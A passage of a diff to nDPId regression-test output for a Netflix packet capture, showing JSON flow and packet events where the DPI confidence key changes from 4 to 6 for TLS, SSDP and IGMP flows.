-00962{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"netflix.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319033206,"flow_last_seen":1484319033261,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1484319033261,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53117,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01016{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":103,"source":"netflix.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319033206,"flow_last_seen":1484319033312,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":353,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1484319033312,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53117,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +00962{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"netflix.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319033206,"flow_last_seen":1484319033261,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1484319033261,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53117,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01016{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":103,"source":"netflix.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319033206,"flow_last_seen":1484319033312,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":353,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1484319033312,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53117,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":143,"source":"netflix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319033631,"flow_last_seen":1484319033631,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319033631,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53118,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":143,"source":"netflix.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1484319033631,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319033631,"pkt":"gCqoTGHM5JjWH70UCABFAABAVMpAAEAGIQjAqAEHNkXM8c9+AbvPvqpAAAAAALAC\/\/9MiwAAAgQFtAEDAwUBAQgKH2S67gAAAAAEAgAA"} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":144,"source":"netflix.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1484319033678,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319033678,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACoGi7Y2RczxwKgBBwG7z36\/HDHnz76qQaASRepQUQAAAgQFtAQCCAqFp1CVH2S67gEDAwg="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":145,"source":"netflix.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1484319033680,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319033680,"pkt":"gCqoTGHM5JjWH70UCABFAAA0\/p1AAEAGd0DAqAEHNkXM8c9+AbvPvqpBvxwx6IAQEBW0wwAAAQEICh9kux6Fp1CV"} -00882{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":146,"source":"netflix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319033631,"flow_last_seen":1484319033681,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":229,"flow_tot_l4_payload_len":229,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1484319033681,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53118,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -00939{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":148,"source":"netflix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319033631,"flow_last_seen":1484319033734,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1677,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1484319033734,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53118,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -01369{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":149,"source":"netflix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319033631,"flow_last_seen":1484319033735,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3125,"flow_avg_l4_payload_len":446,"midstream":0,"thread_ts_msec":1484319033735,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53118,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","server_names":"ichnaea.netflix.com,beacon.netflix.com,presentationtracking.netflix.com,nmtracking.netflix.com,customerevents.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=customerevents.netflix.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"50:D6:DB:AF:1D:A3:83:52:E6:0E:15:8F:98:78:EE:2F:23:FD:E2:3F"}} +00882{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":146,"source":"netflix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319033631,"flow_last_seen":1484319033681,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":229,"flow_tot_l4_payload_len":229,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1484319033681,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53118,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +00939{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":148,"source":"netflix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319033631,"flow_last_seen":1484319033734,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1677,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1484319033734,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53118,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +01369{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":149,"source":"netflix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319033631,"flow_last_seen":1484319033735,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3125,"flow_avg_l4_payload_len":446,"midstream":0,"thread_ts_msec":1484319033735,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53118,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","server_names":"ichnaea.netflix.com,beacon.netflix.com,presentationtracking.netflix.com,nmtracking.netflix.com,customerevents.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=customerevents.netflix.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"50:D6:DB:AF:1D:A3:83:52:E6:0E:15:8F:98:78:EE:2F:23:FD:E2:3F"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":165,"source":"netflix.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319033886,"flow_last_seen":1484319033886,"flow_idle_time":200000,"flow_min_l4_payload_len":122,"flow_max_l4_payload_len":122,"flow_tot_l4_payload_len":122,"flow_avg_l4_payload_len":122,"midstream":0,"thread_ts_msec":1484319033886,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"239.255.255.250","src_port":53776,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00606{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":165,"source":"netflix.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1484319033886,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":164,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":164,"pkt_l4_len":130,"thread_ts_msec":1484319033886,"pkt":"AQBef\/\/65JjWH70UCABFAACWfwIAAAERiKvAqAEH7\/\/\/+tIQB2wAggqVTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMg0KU1Q6IHVybjptZHgtbmV0ZmxpeC1jb206c2VydmljZTp0YXJnZXQ6MA0KDQo="} -00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":165,"source":"netflix.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319033886,"flow_last_seen":1484319033886,"flow_idle_time":200000,"flow_min_l4_payload_len":122,"flow_max_l4_payload_len":122,"flow_tot_l4_payload_len":122,"flow_avg_l4_payload_len":122,"midstream":0,"thread_ts_msec":1484319033886,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"239.255.255.250","src_port":53776,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":165,"source":"netflix.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319033886,"flow_last_seen":1484319033886,"flow_idle_time":200000,"flow_min_l4_payload_len":122,"flow_max_l4_payload_len":122,"flow_tot_l4_payload_len":122,"flow_avg_l4_payload_len":122,"midstream":0,"thread_ts_msec":1484319033886,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"239.255.255.250","src_port":53776,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":173,"source":"netflix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319033943,"flow_last_seen":1484319033943,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319033943,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53119,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":173,"source":"netflix.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1484319033943,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319033943,"pkt":"gCqoTGHM5JjWH70UCABFAABAxzpAAEAGrpfAqAEHNkXM8c9\/Abtb3TwWAAAAALAC\/\/8tbQAAAgQFtAEDAwUBAQgKH2S8FwAAAAAEAgAA"} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":174,"source":"netflix.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1484319033988,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319033988,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACkGjLY2RczxwKgBBwG7z39IJeEpW908F6ASRer4mgAAAgQFtAQCCAqFp1DiH2S8FwEDAwg="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":175,"source":"netflix.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1484319033990,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319033990,"pkt":"gCqoTGHM5JjWH70UCABFAAA0N8lAAEAGPhXAqAEHNkXM8c9\/Abtb3TwXSCXhKoAQEBVdDAAAAQEICh9kvEiFp1Di"} 00610{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":176,"source":"netflix.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1484319033993,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":167,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":167,"pkt_l4_len":133,"thread_ts_msec":1484319033993,"pkt":"AQBef\/\/65JjWH70UCABFAACZ8KEAAAERFwnAqAEH7\/\/\/+tIQB2wAhUYzTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMg0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KDQo="} -00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":177,"source":"netflix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319033943,"flow_last_seen":1484319033997,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":229,"flow_tot_l4_payload_len":229,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1484319033997,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53119,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -00940{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":179,"source":"netflix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319033943,"flow_last_seen":1484319034048,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1677,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1484319034048,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53119,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -01370{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":180,"source":"netflix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319033943,"flow_last_seen":1484319034049,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3125,"flow_avg_l4_payload_len":446,"midstream":0,"thread_ts_msec":1484319034049,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53119,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","server_names":"ichnaea.netflix.com,beacon.netflix.com,presentationtracking.netflix.com,nmtracking.netflix.com,customerevents.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=customerevents.netflix.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"50:D6:DB:AF:1D:A3:83:52:E6:0E:15:8F:98:78:EE:2F:23:FD:E2:3F"}} +00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":177,"source":"netflix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319033943,"flow_last_seen":1484319033997,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":229,"flow_tot_l4_payload_len":229,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1484319033997,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53119,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +00940{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":179,"source":"netflix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319033943,"flow_last_seen":1484319034048,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1677,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1484319034048,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53119,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +01370{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":180,"source":"netflix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319033943,"flow_last_seen":1484319034049,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3125,"flow_avg_l4_payload_len":446,"midstream":0,"thread_ts_msec":1484319034049,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53119,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","server_names":"ichnaea.netflix.com,beacon.netflix.com,presentationtracking.netflix.com,nmtracking.netflix.com,customerevents.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=customerevents.netflix.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"50:D6:DB:AF:1D:A3:83:52:E6:0E:15:8F:98:78:EE:2F:23:FD:E2:3F"}} 00542{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":205,"source":"netflix.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319034890,"flow_last_seen":1484319034890,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1484319034890,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"239.255.255.250","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":205,"source":"netflix.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1484319034890,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":60,"pkt_l4_len":8,"thread_ts_msec":1484319034890,"pkt":"AQBef\/\/65JjWH70UCABGAAAgKLUAAAECSnnAqAEH7\/\/\/+pQEAAAWAPoE7\/\/\/+gAAAAAAAAAAAAAAAAAA"} -00601{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":205,"source":"netflix.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319034890,"flow_last_seen":1484319034890,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1484319034890,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"239.255.255.250","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00601{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":205,"source":"netflix.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319034890,"flow_last_seen":1484319034890,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1484319034890,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"239.255.255.250","l4_proto":2,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 